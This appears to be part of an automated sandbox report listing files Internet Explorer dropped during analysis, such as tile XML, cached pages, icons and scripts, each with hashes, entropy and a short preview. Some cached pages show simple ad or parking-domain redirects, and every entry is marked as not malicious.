                                                                                                                                                                      SHA-256:EACDDFE80072986877C90B4C34CE72DE4CD1AC4BC0D38CF50A3E88B33CC2AFCD
                                                                                                                                                                      SHA-512:8A38E8DB918BF88B2E75DDF1653698FBD793B41624BEF49326BA00ADF008A41D2F4240FFFB774A4EB1A8950DF4DBDB80BB9320F8FD107D3BB28D6ED3B31B3CE4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):665
                                                                                                                                                                      Entropy (8bit):5.122450678810792
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxvLbTDnWimI002EtM3MHdNMNxvLbTDnWimI00OVbmZEtMb:2d6NxvPSZHKd6NxvPSZ7Vmb
                                                                                                                                                                      MD5:905FFB93378DC31AC2DD0A6F8DC342E7
                                                                                                                                                                      SHA1:2016CCDEAC7206B8B975E165084EB4623FED8DD7
                                                                                                                                                                      SHA-256:2749E37E02157835DB9CF9A1F79BB5F23C03B6E094E33862D71709B83C37ADBB
                                                                                                                                                                      SHA-512:C772F25E3C85A51C4B5D3C70F17E0C50398A099AA57746A4FC1E67485E53556A77680246BC74713F261A76EAC0791D8378878A80A8DBB523EC501649F502DC8F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):650
                                                                                                                                                                      Entropy (8bit):5.118921291916546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxibTDnWimI002EtM3MHdNMNxibTDnWimI00OVbd5EtMb:2d6NxMSZHKd6NxMSZ7VJjb
                                                                                                                                                                      MD5:6460C64D25542D88DAB4FCF81DA71778
                                                                                                                                                                      SHA1:676D82A03B0BF5C5DE83E5BCBBDCDEF506516758
                                                                                                                                                                      SHA-256:A22AA7D82C753E3C188A28FD08D19E4D81002135F2BFEBEB1F1A430BE57C8B1B
                                                                                                                                                                      SHA-512:B4494A57CC1FD186F7FE654BDE6EE5BB180ADD9DDC22C3E197BB9BB6CC5A3EA9CE3530B67C2BB3593CDDA8DA15E8D6D76A1F474A1A64EDDE83761022F6F78717
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.1343683532362645
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxhGwbTDnWimI002EtM3MHdNMNxhGwbTDnWimI00OVb8K075EtMb:2d6NxQySZHKd6NxQySZ7VYKajb
                                                                                                                                                                      MD5:8E92836C2D0581401653E8DE5C6B8738
                                                                                                                                                                      SHA1:CBAC5A797B78F7CB6DA7290A1062FBED2949213F
                                                                                                                                                                      SHA-256:F3FC6551AD678A4DF601F69273B5B5E83EC0F4B786D622B8E2936B1472B8E87A
                                                                                                                                                                      SHA-512:EFD3436C0CCA7BAF708695893047ED47C51281D01B2F7556342864946B671A22B4DABE64A3323EBA92CF8B7DE715560652DFB56B4182493B829144F5BFCA56A7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.107052953253313
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNx0nbTDnWimI002EtM3MHdNMNx0nbTDnWimI00OVbxEtMb:2d6Nx0DSZHKd6Nx0DSZ7Vnb
                                                                                                                                                                      MD5:84068C5AA2D27A5EA37F4986D9B215FC
                                                                                                                                                                      SHA1:885375A31C5CA66B7E30A0286DCED8161425B029
                                                                                                                                                                      SHA-256:A8DB220EA8C9068C18AF2503BC68A61749726B169C158174E476120A33D2EB89
                                                                                                                                                                      SHA-512:36E8EA1D95AF9BAACC43AB50690ABC02FB593B14D68F8287854C4C53FBCD2E8B8566A2219DAE529B62A5999ECE9BB62FA944A38971E7AC25AA481D6F7B46D69F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):659
                                                                                                                                                                      Entropy (8bit):5.143005129532291
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxxbTDnWimI002EtM3MHdNMNxxbTDnWimI00OVb6Kq5EtMb:2d6NxtSZHKd6NxtSZ7Vob
                                                                                                                                                                      MD5:D9A16E4485A714D44DE977C8989D70FB
                                                                                                                                                                      SHA1:5664A30464FDE79285274B3E5884EB222545171E
                                                                                                                                                                      SHA-256:DDCF95ECFE4AF66B5667C2A29DF770EF6489860FAC1FAE1AF83E32618C0BE95D
                                                                                                                                                                      SHA-512:B424B71F4C07942B988626CCF2E322CC45C4EB92DE95833AB9821C15D7AF08173671587FEC1D8B3AD4A15097B2D8FA569C90EE1A5846DEF4F0818F02AA811C36
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662
                                                                                                                                                                      Entropy (8bit):5.119025965656811
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxcbTDnWimI002EtM3MHdNMNxcbTDnWimI00OVbVEtMb:2d6NxWSZHKd6NxWSZ7VDb
                                                                                                                                                                      MD5:766F656BF3D12DFEE67986A2D3382BC5
                                                                                                                                                                      SHA1:1E3FFDA3E62935C74FDFD92F70B258CD59400550
                                                                                                                                                                      SHA-256:ED547F3FEA8A4834065CFA3B3BDD68EA8C1E20AB2771C1037C736E21DD00018C
                                                                                                                                                                      SHA-512:E0A76263B06A7F42B84B8B78DE9DAA8DCD0BA8D8C9558093DC14AD8F6DBB741F9EE0826E2728ECEA636265E650559C1E898E7B4A2B53BFB7490D434CAF8BB9BE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                      Entropy (8bit):5.104263951080776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:TMHdNMNxfnbTDnWimI002EtM3MHdNMNxfnbTDnWimI00OVbe5EtMb:2d6NxrSZHKd6NxrSZ7Vijb
                                                                                                                                                                      MD5:BDC8F6FB552E18FBA0BCDA81A21E7082
                                                                                                                                                                      SHA1:ECB3148F93F0A95BE011235060D0F55A4FB5CA5D
                                                                                                                                                                      SHA-256:E8B01F4687A0C7F9122EA277E75590893B34B36413BCC35B63B23CD62D58E495
                                                                                                                                                                      SHA-512:98D2BE5AF7DBB05B705AF8755CE246DE9F305C962C48C0C44AC271256A9ECBC0A94F1C93D315BA8C103313ECEB947E200FC72E2DC691163C95FF9F59F40AD593
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5736
                                                                                                                                                                      Entropy (8bit):3.203464048321813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dparxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222w:ci
                                                                                                                                                                      MD5:11D51B96EA77F30B330194110BA96BC7
                                                                                                                                                                      SHA1:CEA4D42916C32FC21A2C60620DE8F76A2DBC4426
                                                                                                                                                                      SHA-256:79FC13392629FF36B061CD9BD12D6152B300953BC272F6CEAAAA2A2B25B7A005
                                                                                                                                                                      SHA-512:2FE562F5713C6C01A91DFC3E3A962B1C9F8A15033DE73E39E8E9C0DC17397A07361CCDF5170842B0EDE687AD48289C4F191D07D72A08E30257ABD9FFE71C2A9E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ..h.t.t.p.s.:././.g.e.r.t.r.k...c.o.m./.f.a.v.i.c.o.n...i.c.o...........'".... .........(...'...D..... .....................................................................................................................................................................................;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X.......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\0V71R0V5.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):219
                                                                                                                                                                      Entropy (8bit):5.23823323380098
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:IskN20EFNjJ8S/7A+KWRIJiYEUFLZxs4bSl02rBsSZ7NE7uR0Lq9DmJS4IoQ5a8G:wRkrQWR0iYBtqWt2aSyuic4ILoP
                                                                                                                                                                      MD5:D4B691CD9D99117B2EA34586D3E7EEB8
                                                                                                                                                                      SHA1:C79F5572F672361BC097676CB5DA9D4AA956C8B9
                                                                                                                                                                      SHA-256:2178EEDD5723A6AC22E94EC59BDCD99229C87F3623753F5E199678242F0E90DE
                                                                                                                                                                      SHA-512:B69C162BFBA1290C98A2CD222F6EFF9DF69CFC3DBA1651381F4068B30DA813E1687387A794E50B51058C2FDA17B217153BA9599E1E19DC567389B7083093C1FD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>301 Moved</TITLE></HEAD><BODY>.<H1>301 Moved</H1>.The document has moved.<A HREF="http://www.google.com/">here</A>...</BODY></HTML>..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\d4a6d4bd[1].htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1655
                                                                                                                                                                      Entropy (8bit):6.062272980018994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9TQ3GC2lAeIRjHpPQWhLB0yQkcz8uhTMeD3Uenvj:pQUOXNHpPQWJB0yQjQuhAm3Ueb
                                                                                                                                                                      MD5:5DB7C38AA6E80C00473D801F6610B35F
                                                                                                                                                                      SHA1:54DAB73B9A850665843529118E72AC0A5DAA55A1
                                                                                                                                                                      SHA-256:CC334F770DC2A3CD8B1AC2D64E035A71DDF8855C5B68F2DE884D11C7F8EC98E6
                                                                                                                                                                      SHA-512:E299B27F4E09EB08C9F800D54B27548738B9D74A33EFA8A460C488268EB6249CB1F8F932147411F541CF5A3B072BA503BE74A69E2A635AF671474352ED869585
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <html><head><meta name="referrer" content="no-referrer-when-downgrade"><title>Loading</title></head>.<body><script>location.href='https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrm
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):178637
                                                                                                                                                                      Entropy (8bit):5.493248742265343
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:w4zYNQN8X5XXuC2Bi03vb4yeMNzbXAkHM4yuSpAIksLKIp7zHNHwje3EMv5s+:DYNQmSuhMz4AIksPhxHwC3EM++
                                                                                                                                                                      MD5:7AA1AB3412E4EF309043E4EACCCC9EB4
                                                                                                                                                                      SHA1:A7BD66883FABD4B0CBEB2A04FB23FCEA06225351
                                                                                                                                                                      SHA-256:F41266FB78957B17A1D9335EF0AE32C1E153F297952E421CD3703F3FFC66F339
                                                                                                                                                                      SHA-512:C0D37ACF120BD28EE69019B549FB7F5EC2651013B31C38739D23D61C83C76390A9989BBEE6D7D1389463DC9B1420909FE4CF1E534340CCCE85EF7F330EEE17F3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: this.gbar_=this.gbar_||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var pe;._.qe=function(a,b){b?a.setAttribute("role",b):a.removeAttribute("role")};_.M=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;""===c||void 0==c?(pe||(pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};..}catch(e){_._DumpException(e)}.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var se,te,ue;_.re=function(a,b){var c=a.length-b.length;return 0<=c&&a.indexOf(b,c)==c};se=function(a){return"string"==typeof a.className?a.className:a.getAttribute&&a.getAttribute("class")||""};te=function(a){return a.classList?a.classList
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\1G7O03DV.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                      Entropy (8bit):4.811709820418917
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:qzxVkMRJWmNJax3XLxcKv8wF+B9hqecVAqV9qeSF0VqHV7bDRd7HTkIGII:kxVkMq/x3bxrX1eIVseSp1DRRQIGII
                                                                                                                                                                      MD5:7A7107EF5B0185F624703F0CE3161389
                                                                                                                                                                      SHA1:4E95838C06FBE825CD69FEAC3F28E91D6EA12D4F
                                                                                                                                                                      SHA-256:3750F0F41871B5F6A0669E0FAE857A2828AE2A187D8865D6E72F9929C4C00DFB
                                                                                                                                                                      SHA-512:D187740861254F65A115040FC5D0A3FFE9553917FC55EBD5989C6605726D749760144A4C208A89A4B655F2C48A7DAA6CFDDCA2F17C9A15F2DCF78BBA40D8EA16
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <html><head><meta http-equiv="refresh" content="5; url=http://ww9.menehleibe.com/"><title>Loading</title></head>.<body><form method="post" action="http://menehleibe.com/" target="_top" id="rf"><input type="hidden" name="ic" value="0"><input type="hidden" name="fb" value="true"/></form>.<script>document.getElementById("rf").submit()</script></body></html>
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\favicon[1].ico
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:MS Windows icon resource - 1 icon, 39x34, 32 bits/pixel
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5638
                                                                                                                                                                      Entropy (8bit):3.1461120884406477
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222A:fC
                                                                                                                                                                      MD5:DB884D3FED3F81D59E95E27707047C53
                                                                                                                                                                      SHA1:FD991A514B1284506BBBD229F4B067C3C7CC3CEB
                                                                                                                                                                      SHA-256:AAB68489204839B0F8E37065417C542695E914B959927D0E3AFD0D325E3787BC
                                                                                                                                                                      SHA-512:AD5FCAD5D60D89AFCE9ED1A62D05E88E71B664A53B552B428145B8CC2B8133BD8CC7439D615D26591CCC1A58EE5B29A16D4C215488ACF47ECFF0616A5F9B67ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ......'".... .........(...'...D..... .....................................................................................................................................................................................;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\googlelogo_color_84x28dp[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 84 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1785
                                                                                                                                                                      Entropy (8bit):7.86894160499635
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YEOjo9umWXnrXeUpcvNugkko+loEDBKUrSUI3YDZVLMDLDzPhs++s4S9k/vaJvGb:YdBSUmdkkoPeVSUI3kLL0PW++smpU3St
                                                                                                                                                                      MD5:B434F84DE33C4672C8D883A73C67E27C
                                                                                                                                                                      SHA1:15AA5241692EE565028B7CAC1418F6979C061FE1
                                                                                                                                                                      SHA-256:E3EE16B33C7AFC3464C263A9604A39A2E5EE81ED4DD68F56AE7C82D814FAF6BE
                                                                                                                                                                      SHA-512:D449A4F7B1D812D6FE251C87F96AD79953391722A7635799C8B7171DCA63985BB64E8F0F991501513793FA9A1DB88F7B8DCE7D59174CFA23D66FD5EEF1D01813
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .PNG........IHDR...T..........`......IDATx..Zql.e...u...@D......0........ (2..J..5D.P...V..6..D1....BT.E.uC0.......*Qdk7.."[......h{w...............{..:..j#f....b.1KR.s`.C/..0....uI^T........y.P..I.>....\.V.....2.=...y/\.M.H|(..6..kl.|.c....P._c..-5__..<3JT..)`b.8...J.qx..U=..Fo(...+.....)...../.D..,.IQ.....}..f.....LU.ST.n.HF[`.....n>....3.../..e..Of:...r..J.2.]bC8N..q..K...O...S.........6..........R...6.......M.)..T.?..q...d....". !.f..&!.3...D)..;.....=-%.~Piw.......g i..D...7@....hWU...m..i.q...C.K.......v..:.~.v..@.e......|..DG.\._..OO.dyw./M....`........s.xZ.......f..n..#.q.|..=.q>U#nmZ..,v\.......MH.j...@.6`....w..\[`j..fsI..fw............6..^X...O....r...a...z........(s...v.?.-........8?.m.*nq...k.p.k...jhp.{..:d~1.eq._JN......cebo...@.%.j.A)7.q.....|l .v.+&.qI\.o.Pf.,L....a.#%8..g6 uF.YZ%.... .?'e5.......L.Cr..J....t..EJ;....A...J.1.Q...<....8...?{.....$;...6#..Z..j.96..w..&E.:s... .....(!b..@..).;.a..v...,p.t.....5Z.zv...U.....]..[^...
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\LM1X3BMT.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):158522
                                                                                                                                                                      Entropy (8bit):5.912822586462801
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:vosOtA0vKWzhq7gnsUP1jBUN7n3eKCQ6h0/KpG790Q/+vRWca5pv0KdcQfYWi9MT:Q8I9o37w1Qcm0KdcV+t
                                                                                                                                                                      MD5:7B408FDFF3226BE3BA01BB6056273800
                                                                                                                                                                      SHA1:DA6B2223F142BA9006418476708C5BDBE9114796
                                                                                                                                                                      SHA-256:D777C3C3AFF47F876E09CF5A0BF321BC6AC660EB9716FD950CF5277BE70FEE8D
                                                                                                                                                                      SHA-512:6961A69F76D3603B629C7C620A92B34A7269189E2F2D8ACFF83675AB3B6F0A78D5ECB1120A62CAF11D460AAB4257047DFF9D73C6C0ADB8FC162D1A3DBF4996E2
                                                                                                                                                                      Malicious:false
